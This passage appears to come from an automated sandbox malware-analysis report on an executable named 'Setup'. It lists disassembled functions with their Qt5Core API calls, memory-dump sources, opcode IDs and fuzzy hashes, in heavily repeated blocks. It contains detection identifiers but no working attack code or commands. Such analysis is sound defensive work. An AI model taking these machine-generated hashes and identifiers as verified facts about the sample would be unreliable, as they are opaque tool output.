                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$BasicString@@Timer@@Type@$?normalized?registerFlag@Flags@Mutex@@NormalizedObject@@Object@@@TypeType@@Type@@@@Url@@malloc
                                                                                                                                                              • String ID: 2
                                                                                                                                                              • API String ID: 2739650254-450215437
                                                                                                                                                              • Opcode ID: 562d2a763942c4bd56d40ed130b81126aca3e21eca7e9f6cf9d807f15aa3945a
                                                                                                                                                              • Instruction ID: 872a1adc1b75d10c29a4083c6a9a9841d39f9d5da4652a726ad708cdaad6843f
                                                                                                                                                              • Opcode Fuzzy Hash: 562d2a763942c4bd56d40ed130b81126aca3e21eca7e9f6cf9d807f15aa3945a
                                                                                                                                                              • Instruction Fuzzy Hash: 8A2160B2A09A1282EB45EF35E44016D33A6FB48B98F104136EE1E47799EF3CD456CB80
                                                                                                                                                              Function 00007FFBA19DF170 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Latin1String@@String@@@
                                                                                                                                                              • String ID: ActiveConfiguration$UserChoiceConfiguration
                                                                                                                                                              • API String ID: 2468299162-461075109
                                                                                                                                                              • Opcode ID: 6a8cee516f9e814b53a44dc30a7ae8b0fe3e1768c872ff7caccd7835b98a4484
                                                                                                                                                              • Instruction ID: f4801dc3ef09b429dc270a390d574ba6c8af4ffb2997e287edb95c94aa8d366d
                                                                                                                                                              • Opcode Fuzzy Hash: 6a8cee516f9e814b53a44dc30a7ae8b0fe3e1768c872ff7caccd7835b98a4484
                                                                                                                                                              • Instruction Fuzzy Hash: FF111266609B8492EB618F25E441269A7A0FB9CB98F544235DFDC17B28EF3CD255CF00
                                                                                                                                                              Function 00007FFBA198ADA0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH0@Z.QT5CORE(?,?,?,?,?,?,FFFFFFFF,00007FFBA198A0B2), ref: 00007FFBA198ADC6
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,FFFFFFFF,00007FFBA198A0B2), ref: 00007FFBA198ADD6
                                                                                                                                                              • ?setErrorString@QIODevice@@IEAAXAEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,FFFFFFFF,00007FFBA198A0B2), ref: 00007FFBA198ADF3
                                                                                                                                                              Strings
                                                                                                                                                              • QNetworkReplyImplPrivate::error: Internal problem, this method must only be called once., xrefs: 00007FFBA198ADCF
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Logger@@Message$?set?warning@Device@@ErrorString@String@@@
                                                                                                                                                              • String ID: QNetworkReplyImplPrivate::error: Internal problem, this method must only be called once.
                                                                                                                                                              • API String ID: 1040096413-2471882889
                                                                                                                                                              • Opcode ID: 669d8ff553cab5eb2be87317ea885424bc4620306969566064c56a389c449aa3
                                                                                                                                                              • Instruction ID: bb5317d7d569e4210b53e3c23f4449bb20b161ab846eb5f0f4d9f35021e0f9ad
                                                                                                                                                              • Opcode Fuzzy Hash: 669d8ff553cab5eb2be87317ea885424bc4620306969566064c56a389c449aa3
                                                                                                                                                              • Instruction Fuzzy Hash: E6F012A6B0D64183E7518B2AE5546796362FB88BD4F588032CE1E07B64EE7CD456CF00
                                                                                                                                                              Function 00007FFBA1A3ECF0 Relevance: 6.2, APIs: 4, Instructions: 165COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$?fromLatin1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 94203427-0
                                                                                                                                                              • Opcode ID: 8c9eb24988f34ebaf0e63a38e79dba003d787131066cd6078135e74517e55c3e
                                                                                                                                                              • Instruction ID: 60ce398432c8cdc2f99faaf84781d5f2005a36c5a0a9a656bd58c52578f39247
                                                                                                                                                              • Opcode Fuzzy Hash: 8c9eb24988f34ebaf0e63a38e79dba003d787131066cd6078135e74517e55c3e
                                                                                                                                                              • Instruction Fuzzy Hash: DB716FB6B0AA4689EB91DF74D4502FC23B0EB44B88F444433DE2E57A99EF38D509CB50
                                                                                                                                                              Function 00007FFBA1984310 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?firstNode@QHashData@@QEAAPEAUNode@1@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA198434C
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1984393
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA198443E
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1984458
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@HashNode@Node@1@$?nextU21@@$?first
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4069861664-0
                                                                                                                                                              • Opcode ID: ee53047d80ca9d81acbbb856c00d79f7ef59806c9492ed5f082cffbb5b60347c
                                                                                                                                                              • Instruction ID: 5567d1f074b02781ea8b24cd9a4a633604cc3e68b273ca6c53b6a7a94e43988d
                                                                                                                                                              • Opcode Fuzzy Hash: ee53047d80ca9d81acbbb856c00d79f7ef59806c9492ed5f082cffbb5b60347c
                                                                                                                                                              • Instruction Fuzzy Hash: C44193A260A69186DBA1CB36E54067A7BE0FF85FD8F498435DE4E47744DE3CE482CB10
                                                                                                                                                              Function 00007FFBA1993500 Relevance: 6.1, APIs: 4, Instructions: 120memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE ref: 00007FFBA199350F
                                                                                                                                                              • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE ref: 00007FFBA199354F
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE ref: 00007FFBA19935B0
                                                                                                                                                                • Part of subcall function 00007FFBA19937F0: ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,00007FFBA19A18DD), ref: 00007FFBA199382F
                                                                                                                                                                • Part of subcall function 00007FFBA19937F0: ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,00007FFBA19A18DD), ref: 00007FFBA1993845
                                                                                                                                                                • Part of subcall function 00007FFBA19937F0: ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,00007FFBA19A18DD), ref: 00007FFBA1993854
                                                                                                                                                                • Part of subcall function 00007FFBA19937F0: ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,00007FFBA19A18DD), ref: 00007FFBA1993865
                                                                                                                                                                • Part of subcall function 00007FFBA19937F0: ?deallocate@QArrayData@@SAXPEAU1@_K1@Z.QT5CORE(?,?,?,00007FFBA19A18DD), ref: 00007FFBA19938F0
                                                                                                                                                                • Part of subcall function 00007FFBA1994020: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1993890,?,?,?,00007FFBA19A18DD), ref: 00007FFBA199404B
                                                                                                                                                                • Part of subcall function 00007FFBA1994020: ??0QUrl@@QEAA@AEBV0@@Z.QT5CORE(?,?,00000000,00007FFBA1993890,?,?,?,00007FFBA19A18DD), ref: 00007FFBA1994059
                                                                                                                                                                • Part of subcall function 00007FFBA1994020: ??0QDateTime@@QEAA@AEBV0@@Z.QT5CORE(?,?,00000000,00007FFBA1993890,?,?,?,00007FFBA19A18DD), ref: 00007FFBA1994067
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE ref: 00007FFBA1993603
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array$Data@@$?data@$U1@_$?allocate@AllocationData@@@@@Flags@Option@V0@@$?deallocate@?sharedBasicDateNull@Time@@Timer@@Url@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3660288193-0
                                                                                                                                                              • Opcode ID: f8b54cb291cf7b3d8d3a535f7f264ea6f6384ac427188c0ef1f04d5ee5419c7a
                                                                                                                                                              • Instruction ID: 002bd83636da8957b82b7279a1fd3593495d267e10bcf8b084cc6b61965eb3dd
                                                                                                                                                              • Opcode Fuzzy Hash: f8b54cb291cf7b3d8d3a535f7f264ea6f6384ac427188c0ef1f04d5ee5419c7a
                                                                                                                                                              • Instruction Fuzzy Hash: 96519D7270AA8186EB92DF29D04427CBBA5E785F88F498031CF4E077A5DE39D946CB44
                                                                                                                                                              Function 00007FFBA1979C91 Relevance: 6.1, APIs: 4, Instructions: 107COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?dispose@Data@1@@$?begin@?end@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1759210179-0
                                                                                                                                                              • Opcode ID: 75ceffa647d6287fdae49ac024c81bc93490be0ed7cceb1acfb5f110501ef71b
                                                                                                                                                              • Instruction ID: c16c9cc8cf9a9028cb0796138f22307d9a0726da7d966cee971565a0a1b44159
                                                                                                                                                              • Opcode Fuzzy Hash: 75ceffa647d6287fdae49ac024c81bc93490be0ed7cceb1acfb5f110501ef71b
                                                                                                                                                              • Instruction Fuzzy Hash: BE41D472F066428AEFA69B35D1413FD2322EF45BA8F880131CE1E1B695DE2CF446CB50
                                                                                                                                                              Function 00007FFBA1985660 Relevance: 6.1, APIs: 4, Instructions: 104COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA197D9D0: ?detach_helper@QHashData@@QEAAPEAU1@P6AXPEAUNode@1@PEAX@ZP6AX0@ZHH@Z.QT5CORE ref: 00007FFBA197DA08
                                                                                                                                                                • Part of subcall function 00007FFBA197D9D0: ?free_helper@QHashData@@QEAAXP6AXPEAUNode@1@@Z@Z.QT5CORE ref: 00007FFBA197DA3B
                                                                                                                                                              • ?willGrow@QHashData@@QEAA_NXZ.QT5CORE ref: 00007FFBA19856ED
                                                                                                                                                              • ?allocateNode@QHashData@@QEAAPEAXH@Z.QT5CORE ref: 00007FFBA1985748
                                                                                                                                                              • ??0QVariant@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1985767
                                                                                                                                                              • ??4QVariant@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA1985788
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@Hash$V0@@Variant@@$?allocate?detach_helper@?free_helper@?willGrow@Node@Node@1@Node@1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3309448406-0
                                                                                                                                                              • Opcode ID: e4cdecf2fe1ea613299e3caff6c461337b7035638c72fc736545cde864e83434
                                                                                                                                                              • Instruction ID: 88954a0f2f97689fcfb71982654888aee97e12d1c1751d6ffc4711785f694c80
                                                                                                                                                              • Opcode Fuzzy Hash: e4cdecf2fe1ea613299e3caff6c461337b7035638c72fc736545cde864e83434
                                                                                                                                                              • Instruction Fuzzy Hash: 3A41797260AA55C6EB91DF26E840039B3A1FB88FD8B498536DE4E47754DF38E856CB00
                                                                                                                                                              Function 00007FFBA1972620 Relevance: 6.1, APIs: 4, Instructions: 93memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA19720D0: ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,07F00000,00007FFBA1972641,?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA19720FF
                                                                                                                                                                • Part of subcall function 00007FFBA19720D0: ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,07F00000,00007FFBA1972641,?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA1972118
                                                                                                                                                              • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA197266C
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA1972685
                                                                                                                                                              • ??M@YA_NAEBVQString@@0@Z.QT5CORE(?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA19726D4
                                                                                                                                                              • ?startsWith@QString@@QEBA_NAEBV1@W4CaseSensitivity@Qt@@@Z.QT5CORE(?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA1972740
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array$Data@@$?allocate@?data@AllocationData@@@@@Flags@Option@U1@_$?startsCaseQt@@@Sensitivity@String@@String@@0@With@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 606265967-0
                                                                                                                                                              • Opcode ID: 222893d8dedd15edbce94790fc3b2d0ba116e75afda2871a13ca336050a7e897
                                                                                                                                                              • Instruction ID: d707d3a70d7f1929dadafbcee2ac9f557866d78e0ffe2589c862f837fc9439c0
                                                                                                                                                              • Opcode Fuzzy Hash: 222893d8dedd15edbce94790fc3b2d0ba116e75afda2871a13ca336050a7e897
                                                                                                                                                              • Instruction Fuzzy Hash: C231B772B1664645DB92DB26D4001A9A395FF45BE8FC84631DE5D0BBC4DF3DE442CB10
                                                                                                                                                              Function 00007FFBA1991060 Relevance: 6.1, APIs: 4, Instructions: 79timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: V0@@$DateTime@@$BasicTimer@@Url@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1003385927-0
                                                                                                                                                              • Opcode ID: 7997581c6b6480915b240656fe6998afd7a0cf25e81d09609d75de4ac588e4b9
                                                                                                                                                              • Instruction ID: e2a2ac5508dfb2ab7fd3b14e0671bc7c8b564cb4f35947a01140fce9946e9ce6
                                                                                                                                                              • Opcode Fuzzy Hash: 7997581c6b6480915b240656fe6998afd7a0cf25e81d09609d75de4ac588e4b9
                                                                                                                                                              • Instruction Fuzzy Hash: 5A31A3B270AA5697DB92CF35D44016C3360FB44BA8B440032EB5D47BA5DF38E966CB40
                                                                                                                                                              Function 00007FFBA1979AD0 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA197ABB0: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1979AD9), ref: 00007FFBA197ABEA
                                                                                                                                                                • Part of subcall function 00007FFBA197ABB0: _Init_thread_footer.LIBCMT ref: 00007FFBA197AC78
                                                                                                                                                                • Part of subcall function 00007FFBA197ABB0: ??0QByteArray@@QEAA@UQByteArrayDataPtr@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1979AD9), ref: 00007FFBA197AC89
                                                                                                                                                                • Part of subcall function 00007FFBA197ABB0: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1979AD9), ref: 00007FFBA197ACA1
                                                                                                                                                                • Part of subcall function 00007FFBA197ABB0: _Init_thread_footer.LIBCMT ref: 00007FFBA197AD1F
                                                                                                                                                                • Part of subcall function 00007FFBA197ABB0: ??0QByteArray@@QEAA@UQByteArrayDataPtr@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1979AD9), ref: 00007FFBA197AD30
                                                                                                                                                                • Part of subcall function 00007FFBA197ABB0: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1979AD9), ref: 00007FFBA197AD48
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1979B37
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA1979B45
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1979B97
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA1979BA5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Byte$?dispose@ArrayArray@@DataData@1@@Data@@Init_thread_footerListPtr@@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 713842530-0
                                                                                                                                                              • Opcode ID: 5e570ceedda3c1830d36b96b1ede7e6490b443053b9d0ce4ec2ab005ad55062c
                                                                                                                                                              • Instruction ID: ff6ab3d0909a5921faa635cb487e086a7d7ba112eeed11c75cd3184e0795c33d
                                                                                                                                                              • Opcode Fuzzy Hash: 5e570ceedda3c1830d36b96b1ede7e6490b443053b9d0ce4ec2ab005ad55062c
                                                                                                                                                              • Instruction Fuzzy Hash: 49319272B0BA428AEBA18F21D5802BD6363FF45BA8FC44131CE5E57654DF2CE446CB10
                                                                                                                                                              Function 00007FFBA1997480 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ?dispose@Data@1@@Data@@ListString@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3454606168-0
                                                                                                                                                              • Opcode ID: c9ee453a6c23b94a0f8dde2f411dfc82bb5b841ceba5a2c506936f8cb8cfba58
                                                                                                                                                              • Instruction ID: bee39e13c2fed6a5db0bff7744e02bd1f7845a425dc57dae53a1e7df428ddbe2
                                                                                                                                                              • Opcode Fuzzy Hash: c9ee453a6c23b94a0f8dde2f411dfc82bb5b841ceba5a2c506936f8cb8cfba58
